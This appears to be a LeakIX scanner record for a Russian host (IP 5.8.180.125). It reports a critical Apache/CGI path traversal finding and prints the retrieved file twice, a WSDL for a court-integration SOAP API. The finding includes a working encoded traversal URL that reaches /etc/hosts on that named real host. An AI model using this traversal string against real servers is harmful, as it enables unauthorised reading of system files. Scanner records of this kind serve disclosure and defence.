LeakIX - Host 5.8.180.125

Host 5.8.180.125

Russia

Closed Joint Stock Company CROC incorporated

Detected HTTP traversal vulnerability

An attacker can make use of this vulnerability to step out of the root directory and access other parts of the file system.

This might give the attacker the ability to view restricted files, which could provide the attacker with more information required to further compromise the system.

https://www.acunetix.com/websitesecurity/directory-traversal/

IP: 5.8.180.125
Port: 80
URL: http://5.8.180.125/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts

First seen 2021-10-29 03:23
Last seen 2022-09-03 16:09
Open for 309 days

Severity: critical
Fingerprint: ac4d53c4832b2491c591c07df70dc1d2e383b0d3c5f197cfc984f56243a40338

Found host file trough Directory traversal:
<?xml version="1.0" encoding="utf-8"?>
<wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
	xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap12/"
	xmlns:xs="http://www.w3.org/2001/xmlschema"
	xmlns:apisrv="http://arbitr.ru/integration/api/service/v2.17.13"
	xmlns:api="http://arbitr.ru/integration/api"
	xmlns:ct="http://arbitr.ru/integration/common"
	xmlns:wsp="http://www.w3.org/ns/ws-policy"
	xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
	xmlns:sp="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702"
	xmlns:cpxmlsec="urn:ietf:params:xml:ns:cpxmlsec"
	xmlns:ns="http://arbitr.ru/integration/api/document/common"
	xmlns:ns1="http://arbitr.ru/integration/messages"
	xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" targetnamespace="http://arbitr.ru/integration/api/service/v2.17.13">
	<wsdl:types>
		<xs:schema>
			<xs:import schemalocation="apiservice.xsd" namespace="http://arbitr.ru/integration/api"/>
			<xs:import schemalocation="commontypes.xsd" namespace="http://arbitr.ru/integration/common"/>
		</xs:schema>
	</wsdl:types>
	<wsdl:message name="sendrequestrequestmessage">
		<wsdl:part name="body" element="api:sendrequestrequest"/>
	</wsdl:message>
	<wsdl:message name="sendrequestresponsemessage">
		<wsdl:part name="body" element="api:sendrequestresponse"/>
	</wsdl:message>
	<wsdl:message name="getresponserequestmessage">
		<wsdl:part name="body" element="api:getresponserequest"/>
	</wsdl:message>
	<wsdl:message name="getresponseresponsemessage">
		<wsdl:part name="body" element="api:getresponseresponse"/>
	</wsdl:message>
	<wsdl:message name="getrequestrequestmessage">
		<wsdl:part name="body" element="api:getrequestrequest"/>
	</wsdl:message>
	<wsdl:message name="getrequestresponsemessage">
		<wsdl:part name="body" element="api:getrequestresponse"/>
	</wsdl:message>
	<wsdl:message name="ackrequestmessage">
		<wsdl:part name="body" element="api:ackrequest"/>
	</wsdl:message>
	<wsdl:message name="ackresponsemessage">
		<wsdl:part name="body" element="api:ackresponse"/>
	</wsdl:message>
	<wsdl:message name="getrecoursestatusrequestmessage">
		<wsdl:part name="body" element="api:getrecoursestatusrequest"/>
	</wsdl:message>
	<wsdl:message name="getrecoursestatusresponsemessage">
		<wsdl:part name="body" element="api:getrecoursestatusresponse"/>
	</wsdl:message>
	<wsdl:porttype name="apiporttype">
		<wsdl:operation name="sendrequest">
			<wsdl:documentation>операция отправки запроса в api есо</wsdl:documentation>
			<wsdl:input message="apisrv:sendrequestrequestmessage"/>
			<wsdl:output message="apisrv:sendrequestresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="getresponse">
			<wsdl:documentation>операция получения ответа от api есо на ранее отправленный запрос</wsdl:documentation>
			<wsdl:input message="apisrv:getresponserequestmessage"/>
			<wsdl:output message="apisrv:getresponseresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="getrequest">
			<wsdl:documentation>операция получения запроса от api есо</wsdl:documentation>
			<wsdl:input message="apisrv:getrequestrequestmessage"/>
			<wsdl:output message="apisrv:getrequestresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="ack">
			<wsdl:documentation>операция подтверждения получения ответа от api есо. используется для подтверждения получения ответов, полученных от есо, а также для подтверждения получения запросов, полученных от есо</wsdl:documentation>
			<wsdl:input message="apisrv:ackrequestmessage"/>
			<wsdl:output message="apisrv:ackresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="getrecoursestatus">
			<wsdl:documentation>получение информации по поступившем обращениям по идентификатору massageid. используется для сбора статистики контрагентами.</wsdl:documentation>
			<wsdl:input message="apisrv:getrecoursestatusrequestmessage"/>
			<wsdl:output message="apisrv:getrecoursestatusresponsemessage"/>
		</wsdl:operation>
	</wsdl:porttype>
	<wsdl:binding name="apisoapbinding" type="apisrv:apiporttype">
		<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
		<wsp:policyreference uri="#usernameauthandsignedbodypolicy"/>
		<wsdl:operation name="sendrequest">
			<soap:operation soapaction="http://arbitr.ru/integration/api/sendrequest"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="getresponse">
			<soap:operation soapaction="http://arbitr.ru/integration/api/getresponse"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="getrequest">
			<soap:operation soapaction="http://mos-gorsud.ru/integration/api/getrequest"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="ack">
			<soap:operation soapaction="http://arbitr.ru/integration/api/ack"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="getrecoursestatus">
			<soap:operation soapaction="http://arbitr.ru/integration/api/getrecoursestatus"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
	</wsdl:binding>
	<wsdl:service name="apiservice">
		<wsdl:documentation>web-service api есо</wsdl:documentation>
		<wsdl:port name="apiport" binding="apisrv:apisoapbinding">
			<soap:address location="http://localhost:7001/stub"/>
		</wsdl:port>
	</wsdl:service>
	<wsp:policy wsu:id="signedbodypolicy">
		<wsp:exactlyone>
			<wsp:all>
				<sp:asymmetricbinding>
					<wsp:policy>
						<sp:initiatortoken>
							<wsp:policy>
								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystorecipient">
									<wsp:policy>
										<sp:requirethumbprintreference/>
									</wsp:policy>
								</sp:x509token>
							</wsp:policy>
						</sp:initiatortoken>
						<sp:recipienttoken>
							<wsp:policy>
								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystoinitiator">
									<wsp:policy>
										<sp:requirethumbprintreference/>
									</wsp:policy>
								</sp:x509token>
							</wsp:policy>
						</sp:recipienttoken>
						<sp:algorithmsuite>
							<wsp:policy>
								<!-- из предлагаемых сьютом алгоритмов допустимо использование только гост р 34.11-2012 для эп и гост р 34.10-2012 для хэширования (допустима длина хэша 256 и 512 бит)-->
								<cpxmlsec:basicgost/>
							</wsp:policy>
						</sp:algorithmsuite>
						<sp:layout>
							<wsp:policy>
								<sp:strict/>
							</wsp:policy>
						</sp:layout>
						<sp:onlysignentireheadersandbody/>
					</wsp:policy>
				</sp:asymmetricbinding>
				<sp:signedparts>
					<sp:body/>
				</sp:signedparts>
			</wsp:all>
		</wsp:exactlyone>
	</wsp:policy>
	<wsp:policy wsu:id="usernameauthenticationpolicy">
		<wsp:exactlyone>
			<wsp:all>
				<sp:supportingtokens>
					<wsp:policy>
						<sp:usernametoken sp:includetoken="http://schemas.xmlsoap.org/ws/2005/07/securitypolicy/includetoken/alwaystorecipient">
							<wsp:policy>
								<sp:wssusernametoken10/>
							</wsp:policy>
						</sp:usernametoken>
					</wsp:policy>
				</sp:supportingtokens>
			</wsp:all>
		</wsp:exactlyone>
	</wsp:policy>
	<wsp:policy wsu:id="usernameauthandsignedbodypolicy">
		<wsp:all>
			<wsp:policyreference uri="#signedbodypolicy"/>
			<wsp:policyreference uri="#usernameauthenticationpolicy"/>
		</wsp:all>
	</wsp:policy>
</wsdl:definitions>

Found on 2021-12-15 15:53

Severity: critical
Fingerprint: ac4d53c4832b2491752255c4aa2352fbb0eca270ee042136f44e55ab4051e159

Found host file trough Apache traversal:
<?xml version="1.0" encoding="utf-8"?>
<wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
	xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap12/"
	xmlns:xs="http://www.w3.org/2001/xmlschema"
	xmlns:apisrv="http://arbitr.ru/integration/api/service/v2.17.13"
	xmlns:api="http://arbitr.ru/integration/api"
	xmlns:ct="http://arbitr.ru/integration/common"
	xmlns:wsp="http://www.w3.org/ns/ws-policy"
	xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
	xmlns:sp="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702"
	xmlns:cpxmlsec="urn:ietf:params:xml:ns:cpxmlsec"
	xmlns:ns="http://arbitr.ru/integration/api/document/common"
	xmlns:ns1="http://arbitr.ru/integration/messages"
	xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" targetnamespace="http://arbitr.ru/integration/api/service/v2.17.13">
	<wsdl:types>
		<xs:schema>
			<xs:import schemalocation="apiservice.xsd" namespace="http://arbitr.ru/integration/api"/>
			<xs:import schemalocation="commontypes.xsd" namespace="http://arbitr.ru/integration/common"/>
		</xs:schema>
	</wsdl:types>
	<wsdl:message name="sendrequestrequestmessage">
		<wsdl:part name="body" element="api:sendrequestrequest"/>
	</wsdl:message>
	<wsdl:message name="sendrequestresponsemessage">
		<wsdl:part name="body" element="api:sendrequestresponse"/>
	</wsdl:message>
	<wsdl:message name="getresponserequestmessage">
		<wsdl:part name="body" element="api:getresponserequest"/>
	</wsdl:message>
	<wsdl:message name="getresponseresponsemessage">
		<wsdl:part name="body" element="api:getresponseresponse"/>
	</wsdl:message>
	<wsdl:message name="getrequestrequestmessage">
		<wsdl:part name="body" element="api:getrequestrequest"/>
	</wsdl:message>
	<wsdl:message name="getrequestresponsemessage">
		<wsdl:part name="body" element="api:getrequestresponse"/>
	</wsdl:message>
	<wsdl:message name="ackrequestmessage">
		<wsdl:part name="body" element="api:ackrequest"/>
	</wsdl:message>
	<wsdl:message name="ackresponsemessage">
		<wsdl:part name="body" element="api:ackresponse"/>
	</wsdl:message>
	<wsdl:message name="getrecoursestatusrequestmessage">
		<wsdl:part name="body" element="api:getrecoursestatusrequest"/>
	</wsdl:message>
	<wsdl:message name="getrecoursestatusresponsemessage">
		<wsdl:part name="body" element="api:getrecoursestatusresponse"/>
	</wsdl:message>
	<wsdl:porttype name="apiporttype">
		<wsdl:operation name="sendrequest">
			<wsdl:documentation>операция отправки запроса в api есо</wsdl:documentation>
			<wsdl:input message="apisrv:sendrequestrequestmessage"/>
			<wsdl:output message="apisrv:sendrequestresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="getresponse">
			<wsdl:documentation>операция получения ответа от api есо на ранее отправленный запрос</wsdl:documentation>
			<wsdl:input message="apisrv:getresponserequestmessage"/>
			<wsdl:output message="apisrv:getresponseresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="getrequest">
			<wsdl:documentation>операция получения запроса от api есо</wsdl:documentation>
			<wsdl:input message="apisrv:getrequestrequestmessage"/>
			<wsdl:output message="apisrv:getrequestresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="ack">
			<wsdl:documentation>операция подтверждения получения ответа от api есо. используется для подтверждения получения ответов, полученных от есо, а также для подтверждения получения запросов, полученных от есо</wsdl:documentation>
			<wsdl:input message="apisrv:ackrequestmessage"/>
			<wsdl:output message="apisrv:ackresponsemessage"/>
		</wsdl:operation>
		<wsdl:operation name="getrecoursestatus">
			<wsdl:documentation>получение информации по поступившем обращениям по идентификатору massageid. используется для сбора статистики контрагентами.</wsdl:documentation>
			<wsdl:input message="apisrv:getrecoursestatusrequestmessage"/>
			<wsdl:output message="apisrv:getrecoursestatusresponsemessage"/>
		</wsdl:operation>
	</wsdl:porttype>
	<wsdl:binding name="apisoapbinding" type="apisrv:apiporttype">
		<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
		<wsp:policyreference uri="#usernameauthandsignedbodypolicy"/>
		<wsdl:operation name="sendrequest">
			<soap:operation soapaction="http://arbitr.ru/integration/api/sendrequest"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="getresponse">
			<soap:operation soapaction="http://arbitr.ru/integration/api/getresponse"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="getrequest">
			<soap:operation soapaction="http://mos-gorsud.ru/integration/api/getrequest"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="ack">
			<soap:operation soapaction="http://arbitr.ru/integration/api/ack"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
		<wsdl:operation name="getrecoursestatus">
			<soap:operation soapaction="http://arbitr.ru/integration/api/getrecoursestatus"/>
			<wsdl:input>
				<soap:body parts="body" use="literal"/>
			</wsdl:input>
			<wsdl:output>
				<soap:body parts="body" use="literal"/>
			</wsdl:output>
		</wsdl:operation>
	</wsdl:binding>
	<wsdl:service name="apiservice">
		<wsdl:documentation>web-service api есо</wsdl:documentation>
		<wsdl:port name="apiport" binding="apisrv:apisoapbinding">
			<soap:address location="http://localhost:7001/stub"/>
		</wsdl:port>
	</wsdl:service>
	<wsp:policy wsu:id="signedbodypolicy">
		<wsp:exactlyone>
			<wsp:all>
				<sp:asymmetricbinding>
					<wsp:policy>
						<sp:initiatortoken>
							<wsp:policy>
								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystorecipient">
									<wsp:policy>
										<sp:requirethumbprintreference/>
									</wsp:policy>
								</sp:x509token>
							</wsp:policy>
						</sp:initiatortoken>
						<sp:recipienttoken>
							<wsp:policy>
								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystoinitiator">
									<wsp:policy>
										<sp:requirethumbprintreference/>
									</wsp:policy>
								</sp:x509token>
							</wsp:policy>
						</sp:recipienttoken>
						<sp:algorithmsuite>
							<wsp:policy>
								<!-- из предлагаемых сьютом алгоритмов допустимо использование только гост р 34.11-2012 для эп и гост р 34.10-2012 для хэширования (допустима длина хэша 256 и 512 бит)-->
								<cpxmlsec:basicgost/>
							</wsp:policy>
						</sp:algorithmsuite>
						<sp:layout>
							<wsp:policy>
								<sp:strict/>
							</wsp:policy>
						</sp:layout>
						<sp:onlysignentireheadersandbody/>
					</wsp:policy>
				</sp:asymmetricbinding>
				<sp:signedparts>
					<sp:body/>
				</sp:signedparts>
			</wsp:all>
		</wsp:exactlyone>
	</wsp:policy>
	<wsp:policy wsu:id="usernameauthenticationpolicy">
		<wsp:exactlyone>
			<wsp:all>
				<sp:supportingtokens>
					<wsp:policy>
						<sp:usernametoken sp:includetoken="http://schemas.xmlsoap.org/ws/2005/07/securitypolicy/includetoken/alwaystorecipient">
							<wsp:policy>
								<sp:wssusernametoken10/>
							</wsp:policy>
						</sp:usernametoken>
					</wsp:policy>
				</sp:supportingtokens>
			</wsp:all>
		</wsp:exactlyone>
	</wsp:policy>
	<wsp:policy wsu:id="usernameauthandsignedbodypolicy">
		<wsp:all>
			<wsp:policyreference uri="#signedbodypolicy"/>
			<wsp:policyreference uri="#usernameauthenticationpolicy"/>
		</wsp:all>
	</wsp:policy>
</wsdl:definitions>

Found on 2021-10-29 03:23

Create report

Domain summary

No record